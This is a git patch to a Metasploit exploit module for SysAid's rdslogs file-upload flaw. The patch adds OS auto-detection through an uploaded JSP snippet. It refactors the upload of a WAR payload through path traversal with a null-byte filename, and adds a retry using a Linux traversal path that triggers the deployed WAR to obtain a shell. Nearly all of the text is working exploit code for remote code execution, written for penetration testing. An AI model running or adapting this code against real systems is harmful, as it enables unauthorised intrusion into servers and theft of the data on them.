From 7483e77bbac623981eb29cb8ed8fbb7c3b9ee656 Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro <pedrib@gmail.com>
Date: Sat, 18 Jul 2015 20:12:13 +0100
Subject: [PATCH] Fix Linux target by trying again if exploit fails

---
 .../multi/http/sysaid_rdslogs_fle_upload.rb   | 103 +++++++++++++-----
 1 file changed, 78 insertions(+), 25 deletions(-)

diff --git a/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
index 7e3a02f8de..4c60e5559c 100644
--- a/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
+++ b/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
@@ -75,18 +75,66 @@ class Metasploit3 < Msf::Exploit::Remote
       return Exploit::CheckCode::Detected
     end
   end
+  
+  
+  def pick_target
+    unless target.name == 'Automatic'
+      return target
+    end
+
+    print_status("#{peer} - Determining target")
+    os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
+    url = upload_payload(os_finder_payload, false)
+
+    res = send_request_cgi({
+      'uri'    => normalize_uri(datastore['TARGETURI'], url),
+      'method' => 'GET',
+      'cookie' => @cookie,
+      'headers' => { 'Referer' => Rex::Text.rand_text_alpha(10 + rand(10)) }
+    })
+
+    if res && res.code == 200
+      if res.body.to_s =~ /Linux/
+        register_files_for_cleanup('webapps/' + url)
+        return targets[1]
+      elsif res.body.to_s =~ /Windows/
+        register_files_for_cleanup('root/' + url)
+        return targets[2]
+      end
+    end
+
+    nil
+  end
+  
+  
+  def send_payload(war_payload, tomcat_path, app_base)
+    # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail
+    print_status("#{peer} - Uploading WAR file...")
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'),
+      'method' => 'POST',
+      'data' => Zlib::Deflate.deflate(war_payload),
+      'ctype' => 'application/octet-stream',
+      'vars_get' => {
+        'rdsName' => "../../../../#{tomcat_path}#{app_base}.war\x00"
+      }
+    })
+    
+    # The server either returns a 200 OK when the upload is successful.
+    if res && res.code == 200
+      print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")
+    else
+      fail_with(Failure::Unknown, "#{peer} - WAR upload failed")
+    end
+  end
 
 
   def exploit
-    app_base = rand_text_alphanumeric(4 + rand(32 - 4))
-    tomcat_path = '../../../../'
-    servlet_path = 'rdslogs'
-
     # We need to create the upload directories before our first attempt to upload the WAR.
     print_status("#{peer} - Creating upload directory")
     bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
     send_request_cgi({
-      'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
+      'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'),
       'method' => 'POST',
       'data' => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))),
       'ctype' => 'application/xml',
@@ -95,27 +143,11 @@ class Metasploit3 < Msf::Exploit::Remote
       }
     })
 
+    app_base = rand_text_alphanumeric(4 + rand(32 - 4))
     war_payload = payload.encoded_war({ :app_name => app_base }).to_s
-
-    # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail
-    print_status("#{peer} - Uploading WAR file...")
-    res = send_request_cgi({
-      'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
-      'method' => 'POST',
-      'data' => Zlib::Deflate.deflate(war_payload),
-      'ctype' => 'application/octet-stream',
-      'vars_get' => {
-        'rdsName' => "#{tomcat_path}/tomcat/webapps/#{app_base}.war\x00"
-      }
-    })
-
-    # The server either returns a 200 OK when the upload is successful.
-    if res && res.code == 200
-      print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")
-      register_files_for_cleanup("tomcat/webapps/#{app_base}.war")
-    else
-      fail_with(Failure::Unknown, "#{peer} - WAR upload failed")
-    end
+    
+    send_payload(war_payload, 'tomcat/webapps/', app_base)
+    register_files_for_cleanup("tomcat/webapps/#{app_base}.war")
 
     10.times do
       select(nil, nil, nil, 2)
@@ -131,5 +163,26 @@ class Metasploit3 < Msf::Exploit::Remote
       # Success! Triggered the payload, should have a shell incoming
       break if res.code == 200
     end
+    print_error("#{peer} - Failed to launch payload. Trying one last time with a different path...")
+    
+    # OK this might be a Linux server, it's a different traversal path.
+    # Let's try again...
+    send_payload(war_payload, '', app_base)
+    register_files_for_cleanup("webapps/#{app_base}.war")
+    
+    10.times do
+      select(nil, nil, nil, 2)
+
+      # Now make a request to trigger the newly deployed war
+      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
+      res = send_request_cgi({
+        'uri'    => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
+        'method' => 'GET'
+      })
+      # Failure. The request timed out or the server went away.
+      break if res.nil?
+      # Success! Triggered the payload, should have a shell incoming
+      break if res.code == 200
+    end    
   end
 end